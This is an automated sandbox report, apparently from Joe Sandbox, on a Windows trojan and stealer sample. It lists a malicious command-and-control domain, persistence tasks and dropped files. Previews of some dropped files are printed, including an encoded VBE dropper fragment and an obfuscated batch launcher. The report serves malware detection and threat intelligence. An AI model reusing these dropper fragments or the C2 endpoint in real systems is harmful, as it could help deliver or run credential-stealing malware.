http://749858cm.renyash.ru	100%	Avira URL Cloud	malware
http://www.w3.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
749858cm.renyash.ru	104.21.38.84	true	true		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://749858cm.renyash.ru/javascriptrequestApiBasePrivate.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
http://www.fontbureau.com/designersG	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
http://www.fontbureau.com/designers/?	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://749858cm.reP:	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.28.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
http://www.fontbureau.com/designers	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.28.dr	false		high
http://www.founder.com.cn/cn/cThe	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.w3.	BrokerhostNet.exe, 00000016.00000002.2239308433.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.28.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
https://contoso.com/	powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BrokerhostNet.exe, 00000007.00000002.2027859047.000000000325D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2067060610.0000023880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1931000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000001C.00000003.2173548444.0000022F854E2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.2067060610.0000023880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
http://crl.ver)	svchost.exe, 0000001C.00000002.3017784177.0000022F85600000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.microsoft.	powershell.exe, 0000000F.00000002.2189135680.0000016CE9D5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://749858cm.renyash.ru	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.founder.com.cn/cn	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 0000001C.00000003.2173548444.0000022F854E2000.00000004.00000800.00020000.00000000.sdmp, edb.log.28.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.2067060610.0000023880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 0000000E.00000002.2067060610.0000023880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://749858cm.renyash.ru/	XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.38.84	749858cm.renyash.ru	United States		13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576406
Start date and time:	2024-12-17 00:06:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gkcQYEdJSO.exe renamed because original name is a hash value
Original Sample Name:	b5a1474fcb8f7b9809d52546bd304af3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@30/47@1/2
EGA Information:	Successful, ratio: 22.2%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BrokerhostNet.exe, PID 3164 because it is empty
Execution Graph export aborted for target BrokerhostNet.exe, PID 5800 because it is empty
Execution Graph export aborted for target BrokerhostNet.exe, PID 7844 because it is empty
Execution Graph export aborted for target XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, PID 1704 because it is empty
Execution Graph export aborted for target XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, PID 416 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8044 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8060 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: gkcQYEdJSO.exe

Simulations

Behavior and APIs

Time	Type	Description
18:07:35	API Interceptor	50x Sleep call for process: powershell.exe modified
18:07:48	API Interceptor	522901x Sleep call for process: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe modified
18:07:49	API Interceptor	2x Sleep call for process: svchost.exe modified
23:07:35	Task Scheduler	Run new task: BrokerhostNet path: "C:\Bridgecontainerserver\BrokerhostNet.exe"
23:07:35	Task Scheduler	Run new task: BrokerhostNetB path: "C:\Bridgecontainerserver\BrokerhostNet.exe"
23:07:35	Task Scheduler	Run new task: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM path: "C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe"
23:07:35	Task Scheduler	Run new task: XxLYuMpEItUOFsDOBvkEQVmYCLNZEMX path: "C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.38.84	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
749858cm.renyash.ru	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	172.67.220.198
fp2e7a.wpc.phicdn.net	wayneenterprisesbatcave-6.0.1901-windows-installer.msi	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	09-FD-94.03.60.175.07.xlsx.exe	Get hash	malicious	GuLoader	Browse	192.229.221.95
	wf1Ps82LYF.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	YPgggL1oh7.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	SPHINX.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	AV4b38nlhN.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	fm2r286nqT.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	msimg32.dll	Get hash	malicious	RHADAMANTHYS	Browse	192.229.221.95
	YBkzZEtVcK.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	xGW5bGPCIg.exe	Get hash	malicious	Cryptbot	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.21.2.110
	https://ivsmn.kidsavancados.com/	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://uvcr.ovactanag.ru/jQXv/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://bgf43.bookrecce.com/vfd23ced/#sean@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://tinyurl.com/cueen04fmfsf	Get hash	malicious	Unknown	Browse	172.67.204.38
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	104.21.64.208
	https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204ad	Get hash	malicious	Unknown	Browse	162.159.128.61
	securedoc_20241216T121346.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2FN4SKHyAe889o909j2BgEQTYHmZASxysFG5X1abiH-2Bc9UXRQ1Ein-2BS-2BlY0g6W3s6a-2Bg8fspAfccvSCNZ8UZez1w-3D-3DUR2i_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTU66UCHiyx70Gk8JDD2YjXZuzQvmiRgDA-2FXjbWgjk3i1v2Ulq6y1yKgmK1yrN5XfmHVDLnIEf-2BjigPUThjsOSZZpY0Q2K61IDWrFAR0MbUNzwiY-2FVg-2BeuZ5GmE7khj3oFCj0ivt137LdIBat61ZEFDp	Get hash	malicious	Unknown	Browse	104.21.90.56
	Setup.exe (1).zip	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BxbrKIuG.log	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse
	CPNSQusnwC.exe	Get hash	malicious	DCRat	Browse
	Dfim58cp4J.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	IYXE4Uz61k.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	hjgesadfseawd.exe	Get hash	malicious	DCRat	Browse
	kyhjasehs.exe	Get hash	malicious	DCRat	Browse
	adjthjawdth.exe	Get hash	malicious	DCRat	Browse
	based.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
C:\Bridgecontainerserver\BrokerhostNet.exe	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse
C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse

Created / dropped Files

C:\Bridgecontainerserver\BrokerhostNet.exe

Download File

Process:	C:\Users\user\Desktop\gkcQYEdJSO.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1961984
Entropy (8bit):	7.5540495070760905
Encrypted:	false
SSDEEP:	49152:4hKLUy2ich2Y+jCRZCH77sVccM50sF/CwsuVo:4hKPFch2YHgbucc00Odo
MD5:	0F91548CA49C64D6A8CD3846854F484C
SHA1:	033C309B683020221AE189C4236A70C0D3DDD568
SHA-256:	A7883947A5F3C0D74F3EAC6C2A6DA45555298D769F5E3137E10A3ECE14E83DFD
SHA-512:	E207B5545CEED034EC22F13E1A36F13656721B2C9CAB97F6EC7BA8195F32DDC1673E1334902B2D4FC0CE393BAF7F806BEDF4A03A26A8FFE79AD17A87CF9A90A2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Bridgecontainerserver\BrokerhostNet.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgecontainerserver\BrokerhostNet.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._g................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H...........,...............&...........................................0..........(.... ........8........E....9...............84...(.... ....8....(.... ....~....{g...9....& ....8....(.... ....~....{....:....& ....8........0..<....... ........8........E....i...........u...).......U...8d...8j... ....~....{....:....& ....8........~....(@...~....(D... ....<.... ....8....~....9.... ....8v...r...ps....z8.... ....~....{....9Q...& ....8F...~....(8... .... .... ....s....~....(<...

C:\Bridgecontainerserver\SlMo.bat

Download File

Process:	C:\Users\user\Desktop\gkcQYEdJSO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	89
Entropy (8bit):	5.11849761614088
Encrypted:	false
SSDEEP:	3:nEnlHmXijn1o5n3VXGGsKWdiXNEPDO3Vhn:+myb+BAKE8WsVh
MD5:	20C75FEF4553C17D36635750CFB57049
SHA1:	8489A5998ACAA63326BC1A665C38EB71C5D1F426
SHA-256:	0DCEF4794868F563D515BBEEE69E35DDE750411EE9DCAAFDEF597806C89CABD0
SHA-512:	2819F6585BD3EE7E9F1703C259B97B21DBACDE276186A489ACFEA0C36F377F751845B50ED00A70E029E95F588193CF69F77AEAF2785E67888378B9F2E95EE92A
Malicious:	false
Preview:	%gabEgBvWbO%%wQPPI%..%WZGFBUH%"C:\Bridgecontainerserver/BrokerhostNet.exe"%lSNvHajfkRpiH%

C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe

Download File

Process:	C:\Users\user\Desktop\gkcQYEdJSO.exe
File Type:	data
Category:	dropped
Size (bytes):	204
Entropy (8bit):	5.715910351078393
Encrypted:	false
SSDEEP:	6:GVWvwqK+NkLzWbHnrFnBaORbM5nCkahPzuR/bgASOs:GVW2MCzWLnhBaORbQCRPiPc
MD5:	E52EEC5FE59F0E73555C7D43C0035F62
SHA1:	E6FCC87B7D260C2FCFFF89E28E7D45357357520E
SHA-256:	B5712CE1AA870E16ED1464F1ECD627AED7020BB48C61252471CF9EC0B2D38D7F
SHA-512:	325C467E6519FB72238C62ABBB7B89D32016A71416D41F148A38E41853928FC9CC84ED6B096784AF9B1AD23C3363316D6B4F3464959127DFEE1794CC926D40A7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^swAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v f!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z$Mk9o+1W.OlbxnDk+.-.DzJjVtWR(COJBPZ~~0Csk+HTkAAA==^#~@.

C:\Bridgecontainerserver\cd8865f07816b5

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	ASCII text, with very long lines (531), with no line terminators
Category:	dropped
Size (bytes):	531
Entropy (8bit):	5.879036227626265
Encrypted:	false
SSDEEP:	12:QeEnk+T4eE/J+wxgGV0tQCXn+fpmcVpfjegQ+dHDb:QeEODrgGVwQCXnmp0qP
MD5:	52105EEC0C6137C591FD39E57EE8EF0C
SHA1:	B003A97F1D9859039CE3BF7656B6A6BD7DDD2FF6
SHA-256:	FE08E4DA8B08A3595958B52A355B75182E9DEE88DB0FCA90C114E8130A93A85A
SHA-512:	436208E79A677408EA3E5C0EF046CAA6963E1D311A60CA4C5AEE13466ABE711F14C904085B0FDF4A5C735C8ABB63B6F07AE4A4306CACC56811BBBD9931D87ABA
Malicious:	false
Preview:	dGaLUminohtVz7NSMh1fvhlXBXm0m0SrhGWtKWrLEt72B2xmcFLR6Vu6eCJ79rAxOCytldIzzqaCjsWIkAYgpBuLVaOHNuLXsJo8EDB87WbQ4sWwqAW9TdINRmYKOAmFeDTZEYEg8ZjTjeQmDcbMXMDOAbqbp1u7tWv1Z6sS60A34znxVvGviarS9EYmrn1HpmjNsZNHuJPhLKULy3F3u8YTpd1VhFkS93OSQZE5i9BZKJGztNyyh7WqOPiPi1joi6hS5C4YyJUu78JfWBlUQwvBghEA1zXqaW0Nly3rSaAYnltPGC3hQPYwLgvY73g9wnUkI53hH3B0wWY4yz4y60aL8DBFCftZ3Am9RIGKJVZWNiAyH1jI8rC6NJmE3xelKm6vuZnpsupkaD7aDN8L5kaM8pwHgCQV0xMllPDsN4aOCcfJLMAqzSpjMuxEmfIpeTtm1WyyJP8BKLJfKm5UBjghInZ1b9Fswvuss3SzXMhjUoZAkR4Ajyn4xMeN67WKKPOYbbxRUG6zB6NdOZQ

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073781187318436
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrs:KooCEYhgYEL0In
MD5:	B2E7DE5A9DB64DF11B316C46627A1BFC
SHA1:	9C5243DD2F6A374356A0F0DE2CE7669889618A40
SHA-256:	E040E17702BFE7BE58A45907CF7F7DD5981F9FFA1FF74833396A80FE3683A9DE
SHA-512:	A21C479A6EEA22C84BB3275CBE456CD905AEBA6249E8FD7078915A3A390373B9096A16E91BEB0529208E059B9CF47F5A2ABEA950FF9FF04FCEC335F285153543
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xf146bca3, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221878493452627
Encrypted:	false
SSDEEP:	1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
MD5:	6D0382E35ADEE3CF287CCF2EB676EEAD
SHA1:	4D5AF7986072594367DBA1DD57D44C42BD6F7408
SHA-256:	FF3362E1E691014349291FD2C1246F5FF3FD73B5AB80E72FCBD6D0E8D9FFB082
SHA-512:	4B447C2A71F0ED6C7BCC080525977CBCBFBB583FBB8C1BD40260C010574B1779D9A510D5FA04A6BE04F54755436FF105F1C364855F892C0933C43D3F2627BFC2
Malicious:	false
Preview:	.F..... .......A.......X\...;...{......................0.!..........{A.1....\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................3..G1....\|......................1....\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
